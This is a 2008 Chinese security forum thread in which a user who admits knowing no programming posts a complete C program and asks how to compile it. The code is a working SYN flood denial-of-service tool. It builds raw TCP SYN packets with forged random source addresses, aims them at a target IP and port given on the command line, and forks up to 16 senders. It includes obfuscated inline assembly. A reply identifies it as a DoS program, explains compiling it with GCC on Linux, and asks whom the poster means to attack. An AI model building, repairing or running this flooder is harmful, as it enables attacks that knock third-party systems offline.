[求助]谁有时间帮我看一下代码怎么编译-编程技术-看雪-安全社区|安全招聘|kanxue.com

[求助]谁有时间帮我看一下代码怎么编译

发表于: 2008-2-25 22:54 4216

[求助]谁有时间帮我看一下代码怎么编译

rlks

2008-2-25 22:54

4216

#define NULL ((void *)0)
struct timespec {long sec,nsec;};
struct timeval {long tv_sec,tv_usec;};

#define api_1(a) ({int r;asm volatile("int $128":"=a"(r):"a"(a));r;})
#define api_2(a,b) ({int r;asm volatile("int $128":"=a"(r):"a"(a),"b"(b));r;})
#define api_3(a,b,c) ({int r;asm volatile("int $128":"=a"(r):"a"(a),"b"(b),"c"(c));r;})
#define api_4(a,b,c,d) ({int r;asm volatile("int $128":"=a"(r):"a"(a),"b"(b),"c"(c),"d"(d));r;})

#define write(fd,buf,buflen) api_4(4,(int)fd,(void *)buf,(int)buflen)
#define nanosleep(req,rem) api_3(162,(struct timespec *)req,(struct timespec *)rem)
#define times(tbuf) api_2(43,(void *)tbuf)
#define fork() api_1(2)
#define kill(pid,sig) api_3(37,(int)pid,(int)sig)
#define signal(signum,handler) api_3(48,(int)signum,(void (*)(int))handler)
#define exit(exitcode) api_2(1,(int)exitcode)
#define getpid() api_1(20)
#define gettimeofday(tv,tz) api_3(78,(struct timeval *)tv,(struct timeval *)tz)

#define nsleep(delay) ({struct timespec req;req.sec=delay/1000000000L;req.nsec=delay-((delay/1000000000L)*1000000000L);nanosleep(&req,NULL);})
#define time(tv) ({struct timeval t={tv_sec:0,tv_usec:0};gettimeofday(&t,NULL);if ((int *)tv!=NULL) *((int *)tv)=t.tv_sec;t.tv_sec;})
#define utime() ({struct timeval t={tv_sec:0,tv_usec:0};gettimeofday(&t,NULL);(long long)((((long long)t.tv_sec)*1000000)+((long long)t.tv_usec));})

#define strcpy(dst,src) ({int r;asm volatile("pushl %%edi;pushl %%esi;0:;lodsb;stosb;orb %%al,%%al;jnz 0b;movl %%esi,%%eax;popl %%esi;subl %%esi,%%eax;decl %%eax;popl %%edi":"=a"(r):"D"(dst),"S"(src));r;})

static int ultodec(const unsigned long n,char *buf) { unsigned long d=1000000000,v=n; int r; char *p=buf;
do { if (v/d) break; } while (d/=10);
if (!d) *p++='0'; else do { r=v/d; *p++='0'+r; v-=(r*d); } while(d/=10); *p=0; return((int)p-(int)buf);
}

static int ulltodec(const unsigned long long n,char *buf) { unsigned long long d=1000000000L,v=n; int r; char *p=buf;
d*=10000000000L;
do { if (v/d) break; } while (d/=10);
if (!d) *p++='0'; else do { r=v/d; *p++='0'+r; v-=(r*d); } while(d/=10); *p=0; return((int)p-(int)buf);
}

static int inttodec(const unsigned long n,char *buf) { unsigned long d=1000000000,v=n; int r; char *p=buf;
if (v&0x80000000) { *p++='-'; v=((v&0x7fffffff)^0x7fffffff)+1; }
do { if (v/d) break; } while (d/=10);
if (!d) *p++='0'; else do { r=v/d; *p++='0'+r; v-=(r*d); } while(d/=10); *p=0; return((int)p-(int)buf);
}

static unsigned long dectoul(const char *buf) { int p=0; unsigned long v=0; char nc;
while ((nc=buf[p++])) { if ((nc<'0') || (nc>'9')) return(-1); v=(v*10)+(nc-'0'); } if (p==1) return(-1); return(v);
}

static unsigned long long dectoull(const char *buf) { int p=0; unsigned long long v=0; char nc;
while ((nc=buf[p++])) { if ((nc<'0') || (nc>'9')) return(-1); v=(v*10)+(nc-'0'); } if (p==1) return(-1); return(v);
}

static int pf(int fd,const char *fmt,...) { int pos=0,sc=0,cl,cv; char nc; int *param,*param_inval; char buf[1024],*bufp=buf;
asm volatile("movl %%ebp,%%eax;addl $16,%%eax":"=eax"(param)); asm volatile("movl (%%ebp),%%eax;decl %%eax;":"=eax"(param_inval));
if ((int)param>(int)param_inval) return(-1);
while ((nc=fmt[pos++])) { if (sc==1) {
sc=0;
if (nc=='U') {
if (param==param_inval) return(-1);
bufp+=ulltodec(*((unsigned long long *)param++),bufp);
continue;
}
if (nc=='d') {
if (param==param_inval) return(-1);
bufp+=inttodec(*param++,bufp);
continue;
}
if (nc=='s') {
if (param==param_inval) return(-1);
bufp+=strcpy(bufp,(void *)*param++);
continue;
} } if (nc=='%') {
sc=1;
continue; } *bufp++=nc; } *bufp++=0; write(fd,buf,(int)bufp-(int)buf);
}

static long long rndseed=0;

#define rndint() ({rndseed=(rndseed*17261911911134212L)+rndseed+9997826119244517L;(int)rndseed;})
#define rndinit() ({struct timeval t;gettimeofday(&t,NULL);rndseed^=(((long long)((getpid()*t.tv_sec)+(~getpid())+t.tv_sec+times(NULL)))<<32)^((long long)(t.tv_usec^time(NULL)));})

#define socketcall(call,args) api_3(102,call,args)
#define socket(family,type,proto) ({int a[3];a[0]=family;a[1]=type;a[2]=proto;socketcall(1,a);})
#define setsockopt(fd,level,optname,optval,optlen) ({int a[5];a[0]=fd;a[1]=level;a[2]=optname;a[3]=(int)optval;a[4]=optlen;socketcall(14,a);})

struct sockaddr_in { unsigned short family; unsigned short port; unsigned long addr; unsigned char filler[8];
};

#define INADDR_NONE -1

static unsigned long inet_addr(const char *ipstr) { int p=0,cc=0; char nc; unsigned long ip,s=0; unsigned short v=0;
if ((ip=dectoul(ipstr))==-1) { ip=0;
while ((nc=ipstr[p++])) {
if (nc=='.') {
if (!cc) return(INADDR_NONE);
if (s==24) return(INADDR_NONE);
ip|=(v<<s);
s+=8;
cc=0;
v=0;
continue;
}
if (cc==3) return(INADDR_NONE);
if (cc==2) if (!v) return(INADDR_NONE);
cc++;
if ((nc<'0') || (nc>'9')) return(INADDR_NONE);
if ((v=(v*10)+(nc-'0'))>255) return(INADDR_NONE); } if (!cc) return(INADDR_NONE); if (s!=24) return(INADDR_NONE); ip|=(v<<24); }
return(ip);
}

static char inet_ntoa_buf[16];

static char *inet_ntoa(unsigned long ip) { char *buf = inet_ntoa_buf;
buf+=ultodec(ip&0xff,buf); *buf++='.'; buf+=ultodec((ip>>8)&0xff,buf); *buf++='.'; buf+=ultodec((ip>>16)&0xff,buf); *buf++='.'; ultodec(ip>>24,buf); return(inet_ntoa_buf);
}

#define htons(n) (((n>>8)&0xff)|((n&0xff)<<8))
#define ntohs htons

struct iphdr { unsigned char verihl; unsigned char tos; unsigned short len; unsigned short id; unsigned short flg_ofs; unsigned char ttl; unsigned char proto; unsigned short sum; unsigned long src; unsigned long dst;
};

struct tcphdr { unsigned short sport; unsigned short dport; unsigned long seq; unsigned long ackseq; unsigned char thl; unsigned char flags; unsigned short win; unsigned short sum; unsigned short urgptr;
};

struct { struct iphdr ip; struct tcphdr tcp; unsigned long opt[2];
} syn = { ip:{ verihl:(69), len:(htons(48)), flg_ofs:(64), ttl:(128), proto:(6) }, tcp:{ thl:(28<<2), flags:(2), win:htons(16384) }, opt:{0xb4050402,0x3040201}
};

#define AF_INET 2
#define SOCK_RAW 3
#define IPPROTO_IP 0
#define IPPROTO_TCP 6
#define IP_HDRINCL 3

int childpid[15],childcount=0,mainthread=1,killed=0;

long long sendcount=0,starttime=0;

void cleanup_children(void) {
while(childcount--) kill(childpid[childcount],1); childcount=0;
}

void handle_signal(int signum) {
if (killed) return;
killed=1;
if (starttime) { long long elapsed=utime()-starttime;
if (!elapsed) elapsed=1;
pf(2,"pid %d: ",getpid()); pf(2,"ran for %Us, ",elapsed/1000000); pf(2,"%U packets out, ",sendcount); pf(2,"%U bytes/s\n",(sendcount*48000000)/elapsed); }
if (mainthread) { cleanup_children(); nsleep(2000000000L); pf(2,"aborting due to signal %d\n",signum); }
exit(32+signum);
}

unsigned char vc[16] = {4,24,64,128,129,193,194,198,199,205,206,208,209,210,211,216};

#define rmvc(ip) { unsigned char c=ip&0xff;int n; for (n=0;n<16;n++) if (vc[n]==c) {vc[n]=202;break;} }
#define rndip() ({ int r; unsigned char c; r=rndint(); if ((c=(r>>24))&0xfe) c-=2; ((c+1)<<24)|(r&0x00ffff00)|(vc[r&0xf]); })

int main(int argc,char **argv) { int fd,presum,portmask,dport; struct sockaddr_in dst; long long delay=10000000;
{int n;for (n=1;n<32;n++) signal(n,handle_signal);}
if (!argc) return(1);
if ((fd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0) { pf(2,"error %d while creating socket\n",fd); return(2); }
{
int one=1;

if ((one=setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&one,sizeof(one)))) {
pf(2,"error %d while enabling IP_HDRINCL\n",one);
return(3);
} }
if (argc<3) { pf(2,"%s <ip> <port (0=rnd)> [ns (1s/10^9) delay] [threads (dfl:1)]\n",argv[0]); return(4); }
if ((syn.ip.dst=dst.addr=inet_addr(argv[1]))==INADDR_NONE) { pf(2,"invalid ip: %s\n",argv[1]); return(5); }
rmvc(dst.addr);
{
int dstport;

do {
if ((dstport=dectoul(argv[2]))!=-1)
if (!(dstport&0xffff0000)) break;
pf(2,"invalid port: %s\n",argv[2]);
return(6);
} while(0);

if ((dst.port=htons(dstport))) {
dport=dst.port;
portmask=0xffffff;
} else {
dport=htons(1024);
portmask=0xffffffff;
} }
dst.family=AF_INET;
if (argc>3) {
if ((delay=dectoull(argv[3]))==-1) {
pf(2,"invalid delay: %s\n",argv[3]);
return(7); } }
presum=(dst.addr&0xffff)+(dst.addr>>16)+29310; presum=((presum>>16)+(presum&0xffff)); presum=((presum>>16)+presum);
asm volatile("jmp 0f;2:;call 3f;0:;pushl %%edi;pushl %%esi;pushl %%edx;pushl %%ecx;pushl %%ebx;clc;1:;lodsw;adcw %%ax,%%dx;loop 1b;nop;nop;nop;nop;adcw $0,%%dx;pushl %%edx;movl $1044128573,%%edx;jmp 2b;3:;popl %%esi;movl %%esp,%%edi;subl $21,%%edi;movl %%edi,%%ecx;lodsl;xorl %%edx,%%eax;xorl %%eax,%%edx;stosl;lodsl;xorl $-834108802,%%eax;xorl %%eax,%%edx;stosl;lodsl;xorl $-1027902650,%%eax;xorl %%eax,%%edx;stosl;lodsl;xorl $-203227222,%%eax;xorl %%eax,%%edx;stosl;lodsl;xorl $-1595534091,%%eax;xorl %%eax,%%edx;stosl;movb $10,%%al;movl %%edx,%%esi;stosb;movl $4,%%eax;movl $2,%%ebx;movl $21,%%edx;int $128;movl %%esi,%%eax;movl %%eax,%%edx;shrl $16,%%eax;xorw %%ax,%%dx;popl %%eax;subw %%dx,%%ax;sbbw $0,%%ax;popl %%ebx;popl %%ecx;popl %%edx;popl %%esi;popl %%edi;":"=eax"(presum):"c"(14),"d"(presum),"S"(&syn.tcp)); syn.tcp.sport=htons(1024); syn.tcp.dport=dport;
pf(1,"target=%s:%d delay=%U\n",inet_ntoa(dst.addr),ntohs(dst.port),delay);
if (argc>4) {
int children,idx=0;
if ((children=dectoul(argv[4]))==-1) {
pf(2,"invalid thread count: %d, invalid numeric format\n",argv[4]);
return(8); } if (children) childcount=(children-=1); if (children&0xfffffff0) {
pf(2,"invalid thread count: %d, max is 16\n",argv[4]);
return(8); } while (children--) {
int cpid=fork();

if (cpid<0) {
if (idx--) do {
kill(childpid[idx],9);
if (idx) idx--;
} while (idx);
pf(2,"forking error\n");
return(8);
}
if (!cpid) {
mainthread=0;
childcount=0;
break;
}
childpid[idx++]=cpid; } if (childcount) {
pf(1,"using %d threads, pids: %d(main)",childcount+1,getpid());
{
int n=childcount;

while (n--) pf(1," %d",childpid[n]);
}
pf(1,"\n"); } }
{
int a[6],fails=0;

a[0]=fd;
a[1]=(int)&syn;
a[2]=48;
a[3]=0;
a[4]=(int)&dst;
a[5]=sizeof(dst);

rndinit();
starttime=utime();

while (1) {

asm volatile("pushl %%edx;movw %%bx,4(%%edi);movl %%eax,12(%%edi);movl %%ecx,24(%%edi);addw %%ax,%%dx;adcw %%cx,%%dx;adcw $0,%%dx;shrl $16,%%eax;shrl $16,%%ecx;addw %%ax,%%dx;adcw %%cx,%%dx;adcw $0,%%dx;shrl $16,%%ebx;xorb %%cl,%%cl;movb %%bl,%%ch;movw 20(%%edi),%%ax;xorw %%cx,%%ax;movw %%ax,20(%%edi);movw 22(%%edi),%%cx;xorb %%bl,%%bl;xorw %%bx,%%cx;movw %%cx,22(%%edi);addw %%ax,%%dx;adcw %%cx,%%dx;adcw $0,%%dx;xorw $65535,%%dx;movw %%dx,36(%%edi);popl %%edx"::"a"(rndip()),"b"(rndint()&portmask),"c"(rndint()),"d"(presum),"D"(&syn));

if (socketcall(11,a)!=48) {

if (fails++>3) {
int n;
asm("":"=a"(n));
pf(2,"pid %d: error %d while sending packet\n",getpid(),n);
kill(0,1);
return(10);
}

} else {
fails=0;
sendcount++;
}

if (delay) nsleep(delay);
} }
return(0);
}

谁有时间帮我看一下怎么编译上面的代码

我不胜感激，因为我对编程一点不懂，我用TurboC编译出错，如果能看懂的顺路解释一下，有没有别人说的那么夸张

[招生]系统0day安全班，企业级设备固件漏洞挖掘，Linux平台漏洞挖掘！

收藏・0

免费・0

支持

最新回复 (2)
petnt 雪币： 485 活跃值： (12) 能力值： ( LV9，RANK：490 ) 在线值：发帖 32 回帖 1215 粉丝 1 关注私信	petnt 12 2 楼无能为力，看都看不懂。。。 2008-2-25 22:58 0
游客雪币：能力值： (RANK： ) 在线值：发帖 0 回帖 0 粉丝关注私信	游客 3 楼需要在nix(Linux/BSD之类)下用GCC编译, 而且要在nix下才能跑(Hard Code System Call) 晕死, 没注意到后面还要求解释..... 补上解释: 这段程序只不过是一个*nix下很平常的DoS程序而已: 用RAW方式打开一个一个Socket, 然后fork出N个进程, 每个进程都向目标机器发虚构的IP包, 如此而已. 唯一与众不同的是用了一堆的inline汇编, 比如说人家发包是调用send, 它直接用int 0x80调systemcall. 不知道是你转贴的问题还是原文就是如此, 代码写得实在是..... 难怪petnt说看都看不懂还有, "asm volatile {"后面是GCC的inline汇编, 采用AT&T格式, 和Intel格式稍有区别, 主要有以下几点: 1. 寄存器名前加%%(如%%ax), 立即数用十进制, 前面加$(如$128) 2. 操作码后面的b/w/l指的是操作数的大小, 分别对应byte/word/long, 如pushl表示push一个long; 3. 操作数源和目的与Intel刚好相反, 比如说adcw %%ax,%%dx用Intel的写法就是adc dx, ax 最后, 象这类攻击程序, 其效果取决于攻击源的机器性能和带宽, 你拿2M的ADSL去攻人家100M的主机等于帮人家挠痒. BTW: 想攻击谁? 2008-2-26 20:40 编辑删除 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

rlks

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
petnt 雪币： 485 活跃值： (12) 能力值： ( LV9，RANK：490 ) 在线值：发帖 32 回帖 1215 粉丝 1 关注私信	petnt 12 2 楼无能为力，看都看不懂。。。 2008-2-25 22:58 0
游客雪币：能力值： (RANK： ) 在线值：发帖 0 回帖 0 粉丝关注私信	游客 3 楼需要在nix(Linux/BSD之类)下用GCC编译, 而且要在nix下才能跑(Hard Code System Call) 晕死, 没注意到后面还要求解释..... 补上解释: 这段程序只不过是一个*nix下很平常的DoS程序而已: 用RAW方式打开一个一个Socket, 然后fork出N个进程, 每个进程都向目标机器发虚构的IP包, 如此而已. 唯一与众不同的是用了一堆的inline汇编, 比如说人家发包是调用send, 它直接用int 0x80调systemcall. 不知道是你转贴的问题还是原文就是如此, 代码写得实在是..... 难怪petnt说看都看不懂还有, "asm volatile {"后面是GCC的inline汇编, 采用AT&T格式, 和Intel格式稍有区别, 主要有以下几点: 1. 寄存器名前加%%(如%%ax), 立即数用十进制, 前面加$(如$128) 2. 操作码后面的b/w/l指的是操作数的大小, 分别对应byte/word/long, 如pushl表示push一个long; 3. 操作数源和目的与Intel刚好相反, 比如说adcw %%ax,%%dx用Intel的写法就是adc dx, ax 最后, 象这类攻击程序, 其效果取决于攻击源的机器性能和带宽, 你拿2M的ADSL去攻人家100M的主机等于帮人家挠痒. BTW: 想攻击谁? 2008-2-26 20:40 编辑删除 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复